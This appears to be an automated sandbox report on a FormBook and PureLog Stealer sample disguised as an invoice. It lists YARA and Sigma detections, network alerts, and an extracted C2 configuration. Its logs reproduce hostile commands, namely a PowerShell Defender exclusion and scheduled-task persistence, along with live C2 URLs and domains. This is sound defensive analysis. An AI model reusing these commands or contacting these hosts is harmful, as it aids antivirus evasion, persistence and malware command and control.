Process Memory Space: Invoice and packing list.exe PID: 4424	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2c77e:$a1: 3C 30 50 4F 53 54 74 09 40 0x42a4a:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: utlAHqvw.exe PID: 1856	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: utlAHqvw.exe PID: 1856	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x105:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: MSBuild.exe PID: 7148	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x68bdd:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: NETSTAT.EXE PID: 6580	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x78aea:$a1: 3C 30 50 4F 53 54 74 09 40 0x178138:$a1: 3C 30 50 4F 53 54 74 09 40 0x1b05e3:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: rundll32.exe PID: 5968	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5d48f:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 46 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
15.2.MSBuild.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
15.2.MSBuild.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
15.2.MSBuild.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bd80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
15.2.MSBuild.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1aae7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1baea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
15.2.MSBuild.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a09:$sqlite3step: 68 34 1C 7B E1 0x17b1c:$sqlite3step: 68 34 1C 7B E1 0x17a38:$sqlite3text: 68 38 2A 90 C5 0x17b5d:$sqlite3text: 68 38 2A 90 C5 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
15.2.MSBuild.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
15.2.MSBuild.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
15.2.MSBuild.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
15.2.MSBuild.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
15.2.MSBuild.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
0.2.Invoice and packing list.exe.6d60000.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Invoice and packing list.exe.2fd872c.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Invoice and packing list.exe.6d60000.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Invoice and packing list.exe.2fd872c.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.utlAHqvw.exe.350867c.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.utlAHqvw.exe.350867c.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Invoice and packing list.exe.2db69f4.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.utlAHqvw.exe.32e6944.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 13 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice and packing list.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice and packing list.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Invoice and packing list.exe", ParentImage: C:\Users\user\Desktop\Invoice and packing list.exe, ParentProcessId: 4424, ParentProcessName: Invoice and packing list.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice and packing list.exe", ProcessId: 4984, ProcessName: powershell.exe

Sigma detected: Rundll32 Execution Without CommandLine Parameters

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\rundll32.exe", CommandLine: "C:\Windows\SysWOW64\rundll32.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1028, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rundll32.exe", ProcessId: 5968, ProcessName: rundll32.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\utlAHqvw" /XML "C:\Users\user\AppData\Local\Temp\tmp36E8.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\utlAHqvw" /XML "C:\Users\user\AppData\Local\Temp\tmp36E8.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\utlAHqvw.exe, ParentImage: C:\Users\user\AppData\Roaming\utlAHqvw.exe, ParentProcessId: 1856, ParentProcessName: utlAHqvw.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\utlAHqvw" /XML "C:\Users\user\AppData\Local\Temp\tmp36E8.tmp", ProcessId: 4120, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\utlAHqvw" /XML "C:\Users\user\AppData\Local\Temp\tmp2498.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\utlAHqvw" /XML "C:\Users\user\AppData\Local\Temp\tmp2498.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Invoice and packing list.exe", ParentImage: C:\Users\user\Desktop\Invoice and packing list.exe, ParentProcessId: 4424, ParentProcessName: Invoice and packing list.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\utlAHqvw" /XML "C:\Users\user\AppData\Local\Temp\tmp2498.tmp", ProcessId: 6596, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice and packing list.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice and packing list.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Invoice and packing list.exe", ParentImage: C:\Users\user\Desktop\Invoice and packing list.exe, ParentProcessId: 4424, ParentProcessName: Invoice and packing list.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice and packing list.exe", ProcessId: 4984, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\utlAHqvw" /XML "C:\Users\user\AppData\Local\Temp\tmp2498.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\utlAHqvw" /XML "C:\Users\user\AppData\Local\Temp\tmp2498.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Invoice and packing list.exe", ParentImage: C:\Users\user\Desktop\Invoice and packing list.exe, ParentProcessId: 4424, ParentProcessName: Invoice and packing list.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\utlAHqvw" /XML "C:\Users\user\AppData\Local\Temp\tmp2498.tmp", ProcessId: 6596, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T15:31:02.807803+0100	2031453	1	Malware Command and Control Activity Detected	192.168.2.5	49980	121.254.178.252	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.aportsystems.store/a03d/www.oftware-download-92806.bond	Avira URL Cloud: Label: malware
Source: http://www.avid-hildebrand.info/a03d/	Avira URL Cloud: Label: malware
Source: http://www.gmgslzdc.sbs/a03d/www.aportsystems.store	Avira URL Cloud: Label: malware
Source: www.enelog.xyz/a03d/	Avira URL Cloud: Label: malware
Source: http://www.ive-neurozoom.store/a03d/www.yselection.xyz	Avira URL Cloud: Label: malware
Source: http://www.aportsystems.store/a03d/	Avira URL Cloud: Label: malware
Source: http://www.enelog.xyz/a03d/www.inggraphic.pro	Avira URL Cloud: Label: malware
Source: http://www.aja168e.live/a03d/www.kkkk.shop	Avira URL Cloud: Label: malware
Source: http://www.duxrib.xyz/a03d/	Avira URL Cloud: Label: malware
Source: http://www.kkkk.shop/a03d/www.ndogaming.online	Avira URL Cloud: Label: malware
Source: http://www.gmgslzdc.sbs/a03d/	Avira URL Cloud: Label: malware
Source: http://www.otelhafnia.info/a03d/www.argloscaremedia.info	Avira URL Cloud: Label: malware
Source: http://www.eepvid.xyz/a03d/www.gmgslzdc.sbs	Avira URL Cloud: Label: malware
Source: http://www.enelog.xyz/a03d/	Avira URL Cloud: Label: malware
Source: http://www.otelhafnia.info/a03d/	Avira URL Cloud: Label: malware
Source: http://www.oftware-download-92806.bond/a03d/	Avira URL Cloud: Label: malware
Source: http://www.ndogaming.online/a03d/	Avira URL Cloud: Label: malware
Source: http://www.argloscaremedia.info/a03d/	Avira URL Cloud: Label: malware
Source: http://www.avid-hildebrand.info/a03d/www.aja168e.live	Avira URL Cloud: Label: malware
Source: http://www.inggraphic.pro/a03d/	Avira URL Cloud: Label: malware
Source: http://www.itiz.xyz/a03d/	Avira URL Cloud: Label: malware
Source: http://www.yselection.xyz/a03d/	Avira URL Cloud: Label: malware
Source: http://www.itiz.xyz/a03d/www.duxrib.xyz	Avira URL Cloud: Label: malware
Source: http://www.kkkk.shop	Avira URL Cloud: Label: malware
Source: http://www.oftware-download-92806.bond/a03d/www.enelog.xyz	Avira URL Cloud: Label: malware
Source: http://www.ive-neurozoom.store/a03d/	Avira URL Cloud: Label: malware
Source: http://www.duxrib.xyz/a03d/www.otelhafnia.info	Avira URL Cloud: Label: malware
Source: http://www.aja168e.live/a03d/	Avira URL Cloud: Label: malware
Source: http://www.kkkk.shop/a03d/	Avira URL Cloud: Label: malware
Source: http://www.inggraphic.pro/a03d/www.avid-hildebrand.info	Avira URL Cloud: Label: malware
Source: http://www.ndogaming.online/a03d/www.itiz.xyz	Avira URL Cloud: Label: malware
Source: http://www.yselection.xyz/a03d/www.eepvid.xyz	Avira URL Cloud: Label: malware
Source: http://www.eepvid.xyz/a03d/	Avira URL Cloud: Label: malware
Source: http://www.kkkk.shop/a03d/?S0G8J8=RRcPyliP5LCh&Urwh=7kIWeTjXu01wM95wC9Z21TPiKeV9inKAlApT+5tT392VMtn/oeqkDJdMplbadhcUzki4	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000B.00000002.2099537926.00000000042E3000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.enelog.xyz/a03d/"], "decoy": ["nfluencer-marketing-13524.bond", "cebepu.info", "lphatechblog.xyz", "haoyun.website", "itiz.xyz", "orld-visa-center.online", "si.art", "alata.xyz", "mmarketing.xyz", "elnqdjc.shop", "ensentoto.cloud", "voyagu.info", "onvert.today", "1fuli9902.shop", "otelhafnia.info", "rumpchiefofstaff.store", "urvivalflashlights.shop", "0090.pizza", "ings-hu-13.today", "oliticalpatriot.net", "5970.pizza", "arimatch-in.legal", "eepvid.xyz", "bfootball.net", "otorcycle-loans-19502.bond", "nline-advertising-34790.bond", "behm.info", "aportsystems.store", "agiararoma.net", "agfov4u.xyz", "9769.mobi", "ome-renovation-86342.bond", "kkkk.shop", "duxrib.xyz", "xurobo.info", "leurdivin.online", "ive-neurozoom.store", "ndogaming.online", "dj1.lat", "yselection.xyz", "52628.xyz", "lsaadmart.store", "oftware-download-92806.bond", "avid-hildebrand.info", "orashrine.store", "erpangina-treatment-views.sbs", "ategorie-polecane-831.buzz", "oonlightshadow.shop", "istromarmitaria.online", "gmgslzdc.sbs", "asglobalaz.shop", "locarry.store", "eleefmestreech.online", "inggraphic.pro", "atidiri.fun", "olourclubbet.shop", "eatbox.store", "romatografia.online", "encortex.beauty", "8oosnny.xyz", "72266.vip", "aja168e.live", "fath.shop", "argloscaremedia.info"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe

ReversingLabs: Detection: 50%

Multi AV Scanner detection for submitted file

Source: Invoice and packing list.exe	Virustotal: Detection: 55%			Perma Link
Source: Invoice and packing list.exe	ReversingLabs: Detection: 50%

Yara detected FormBook

Source: Yara match	File source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2099537926.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2123422018.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4482139212.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2065480550.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2065480550.0000000003B96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4482595547.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4482552802.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2109123582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Invoice and packing list.exe

Joe Sandbox ML: detected

Source: Invoice and packing list.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Invoice and packing list.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: FYSY.pdb source: Invoice and packing list.exe, utlAHqvw.exe.0.dr
Source:	Binary string: netstat.pdbGCTL source: MSBuild.exe, 0000000F.00000002.2110659682.00000000010A8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.2112598055.0000000001500000.00000040.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000010.00000002.4482049014.0000000000D90000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: netstat.pdb source: MSBuild.exe, 0000000F.00000002.2110659682.00000000010A8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.2112598055.0000000001500000.00000040.10000000.00040000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000010.00000002.4482049014.0000000000D90000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: FYSY.pdbSHA256 source: Invoice and packing list.exe, utlAHqvw.exe.0.dr
Source:	Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: explorer.exe, 0000000A.00000002.4504694781.0000000010DBF000.00000004.80000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000010.00000002.4482370296.0000000003341000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000010.00000002.4483360184.0000000003D9F000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: MSBuild.exe, 0000000F.00000002.2112877198.0000000001510000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000010.00000002.4482891825.0000000003850000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000010.00000003.2111475683.00000000036A8000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000010.00000002.4482891825.00000000039EE000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000010.00000003.2108937259.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.2119670913.0000000004444000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2123724551.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2123724551.000000000493E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.2121528110.00000000045F5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdb source: MSBuild.exe, 00000009.00000002.2120256075.0000000001860000.00000040.10000000.00040000.00000000.sdmp, MSBuild.exe, 00000009.00000002.2119665265.0000000001428000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2123315580.0000000000650000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: MSBuild.exe, MSBuild.exe, 0000000F.00000002.2112877198.0000000001510000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000010.00000002.4482891825.0000000003850000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000010.00000003.2111475683.00000000036A8000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000010.00000002.4482891825.00000000039EE000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000010.00000003.2108937259.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.2119670913.0000000004444000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2123724551.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2123724551.000000000493E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.2121528110.00000000045F5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdbGCTL source: MSBuild.exe, 00000009.00000002.2120256075.0000000001860000.00000040.10000000.00040000.00000000.sdmp, MSBuild.exe, 00000009.00000002.2119665265.0000000001428000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2123315580.0000000000650000.00000040.80000000.00040000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then pop ebx		15_2_00407B1E
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 4x nop then pop ebx		16_2_02F57B1E

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49980 -> 121.254.178.252:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49980 -> 121.254.178.252:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49980 -> 121.254.178.252:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.enelog.xyz/a03d/

Performs DNS queries to domains with low reputation

Source:	DNS query: www.yselection.xyz
Source:	DNS query: www.eepvid.xyz
Source:	DNS query: www.enelog.xyz

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: www.gmgslzdc.sbs replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.oftware-download-92806.bond replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.inggraphic.pro replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.eepvid.xyz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.avid-hildebrand.info replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.aja168e.live replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.yselection.xyz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.ive-neurozoom.store replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.ndogaming.online replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.aportsystems.store replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.enelog.xyz replaycode: Name error (3)

Uses netstat to query active network connections and open ports

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"

Source: global traffic

HTTP traffic detected: GET /a03d/?S0G8J8=RRcPyliP5LCh&Urwh=7kIWeTjXu01wM95wC9Z21TPiKeV9inKAlApT+5tT392VMtn/oeqkDJdMplbadhcUzki4 HTTP/1.1Host: www.kkkk.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

Source: global traffic	DNS traffic detected: DNS query: www.ive-neurozoom.store
Source: global traffic	DNS traffic detected: DNS query: www.yselection.xyz
Source: global traffic	DNS traffic detected: DNS query: www.eepvid.xyz
Source: global traffic	DNS traffic detected: DNS query: www.gmgslzdc.sbs
Source: global traffic	DNS traffic detected: DNS query: www.aportsystems.store
Source: global traffic	DNS traffic detected: DNS query: www.oftware-download-92806.bond
Source: global traffic	DNS traffic detected: DNS query: www.enelog.xyz
Source: global traffic	DNS traffic detected: DNS query: www.inggraphic.pro
Source: global traffic	DNS traffic detected: DNS query: www.avid-hildebrand.info
Source: global traffic	DNS traffic detected: DNS query: www.aja168e.live
Source: global traffic	DNS traffic detected: DNS query: www.kkkk.shop
Source: global traffic	DNS traffic detected: DNS query: www.ndogaming.online

Source: explorer.exe, 0000000A.00000002.4492874400.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4492874400.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2056890977.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2056890977.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 0000000A.00000002.4482316176.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2038920370.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: explorer.exe, 0000000A.00000002.4492874400.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4492874400.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2056890977.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2056890977.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
